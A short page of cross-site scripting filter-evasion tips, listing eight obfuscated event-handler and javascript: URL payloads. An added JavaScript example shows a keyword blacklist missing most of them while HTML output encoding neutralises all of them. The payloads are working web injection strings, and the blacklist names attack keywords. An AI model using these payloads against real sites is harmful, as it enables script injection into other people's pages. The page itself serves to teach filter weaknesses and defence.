Some XSS Tips

  • <input onclick="window.onerror=alert;throw 1">
  • <input onclick="location="javascript:aler'+'t%2'+'81%2'+'9'">
  • <input onclick="top.onerror=top['ale'+'rt'];throw 1">
  • <input onclick="outerHTML=URL">
  • "onblur=javascript:window.onblur=al%00ert;throw 1
  • ()&xss="onclick=a=location.search;location.href="javascript:a"+"lert"+a[1]+a[2]//
  • <input onclick="location=self.name">
  • <input onclick="document.domain=''">

Blacklists are ultimately unsafe.
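
The point above, as an added example that is not part of the original page: a keyword blacklist is run over six of the listed inputs, next to HTML output encoding applied to the same inputs. The blacklist patterns and all function names are assumptions made for illustration; the sample strings are copied from the list.

```javascript
// Added example. Sample strings are copied verbatim from the list above.
// BLACKLIST and the function names are illustrative assumptions.
const SAMPLES = [
  `<input onclick="window.onerror=alert;throw 1">`,
  `<input onclick="top.onerror=top['ale'+'rt'];throw 1">`,
  `<input onclick="outerHTML=URL">`,
  `"onblur=javascript:window.onblur=al%00ert;throw 1`,
  `<input onclick="location=self.name">`,
  `<input onclick="document.domain=''">`,
];

// A keyword blacklist of the kind the page argues against (constructed here).
const BLACKLIST = [/<script/i, /alert/i, /javascript:/i, /eval\s*\(/i];

// True when no pattern matches, i.e. the filter lets the input through.
function blacklistAllows(input) {
  return !BLACKLIST.some((re) => re.test(input));
}

// Inputs the blacklist fails to stop.
function missedByBlacklist(samples) {
  return samples.filter(blacklistAllows);
}

// Output encoding for HTML text and quoted attribute values. It does not try
// to recognise attacks; it removes the characters that turn data into markup.
// It is not sufficient inside <script>, URL or unquoted-attribute contexts.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function encodeHtml(input) {
  return String(input).replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// True when nothing is left that can open a tag or close a quoted attribute.
function isInert(encoded) {
  return !/[<>"']/.test(encoded);
}

const missed = missedByBlacklist(SAMPLES);
console.log(`blacklist let through ${missed.length} of ${SAMPLES.length} inputs`);
for (const s of SAMPLES) {
  console.log(isInert(encodeHtml(s)), encodeHtml(s));
}
```

The blacklist only stops the two inputs that happen to contain a listed keyword, while the encoder renders every input inert without knowing anything about its content.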

Tips from: